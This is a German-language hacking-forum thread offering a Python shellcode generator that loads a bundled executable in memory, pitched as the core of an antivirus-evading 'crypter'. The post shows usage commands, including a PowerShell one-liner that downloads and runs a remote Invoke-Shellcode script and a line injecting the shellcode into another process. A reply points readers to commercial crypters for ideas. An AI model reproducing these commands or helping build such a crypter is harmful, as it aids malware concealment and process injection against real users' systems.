Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

LoadPEGen - Shellcode Generator für PE loading [32/64 Bit]

- - - - -

  • Bitte melde dich an um zu Antworten
Eine Antwort in diesem Thema

#1
o0o

o0o

    Script Kiddie

  • Members
  • PIPPIPPIPPIP
  • Likes
    27
  • 33 Beiträge
  • 16 Bedankt

Dieses Python script generiert einen Shellcode, der versucht eine angegebene native Exe im selben Prozess und selben Thread zu mappen und auszuführen.
Die auszuführende Datei wird ebenfalls in den Shellcode eingefügt.
Den Output kann man dann (am besten natürlich verschlüsselt) speichern und ganz einfach im eigenen Prozess (bspw mit CreateThread) ausführen oder einen fremden Prozess injecten, dabei natürlich jede denkbare Shellcode Execution / Process Injection Methode verwenden.
Konkret für einen Crypter müsste man sich also nur eine Storagemethode überlegen, und schon hat man le fud 1337 crypter, 40$ auf hackforums.

Nützt allerdings nichts gegen Memory Scanner wie bspw. der von ESET, sobald der Shellcode ausgeführt wird liegt die Datei offen im Speicher, und nach dem Mappen natürlich noch mal.
Außerdem failt das loaden auf 32bit Systemen wenn weder Host-Exe noch zu mappende Exe Relocations unterstützten, weil dann die Imagebase schon belegt ist.

Testen kann man es bspw. so:

 

> build_loadpe.py "C:\my\file.exe" out.bin

> powershell

> iex (iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1)

> $bytes = [System.IO.File]::ReadAllBytes('out.bin')

> Invoke-Shellcode -Shellcode $bytes
or
> Invoke-Shellcode -Shellcode $bytes -ProcessId 3333 (injecting into remote process)

Versteckter Inhalt
Klicke auf den Danke-Button um den versteckten Inhalt sehen zu können. Nur registrierte Mitglieder haben Zugriff hierauf.


  • Born2Hack und GhostSteel gefällt das

<3 is all you need


Thanked by 11 Members:
zencrypt , webpanel0815 , parisdefr , breathplayslave , frodo91 , ERBOX , Zerobyte , mesagio , GhostSteel , gr33d , Born2Hack

#2
gr33d

gr33d

    Pentester

  • Premium Member
  • Likes
    169
  • 130 Beiträge
  • 472 Bedankt
  • Android [root]
  • Windows, Linux

Vielen Dank für den Share. Für Storagemethoden würde ich mir einfach Hackforums Crypter anschauen. Die können zwar nicht viel aber man kann sich trotzdem was abschauen.


Bearbeitet von gr33d, 01 December 2017 - 02:49 Uhr.

  • Caruso gefällt das



  Thema Forum Themenstarter Statistik Letzter Beitrag

Dieses Thema wurde von 41 Mitglied(ern) gelesen


    3eyes, Avni, Blackhook, Bloodman, Born2Hack, Bot4ng, breathplayslave, Caruso, dev-0, dos, Dr. Spic, ERBOX, Exynos, fothermucker, Framerater, frodo91, GhostSteel, gr33d, h04x, kiwitone, mesagio, n1nja, nibble nibble, notfound, o0o, PadX18, pi^2, Psykoon303, Rogerlopensio, rsneumann, s3ff, Sandoz, sniffer, sup3ria, twixeis, VerZus, webpanel0815, xVirtu, Yuka, zencrypt, Zerobyte
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.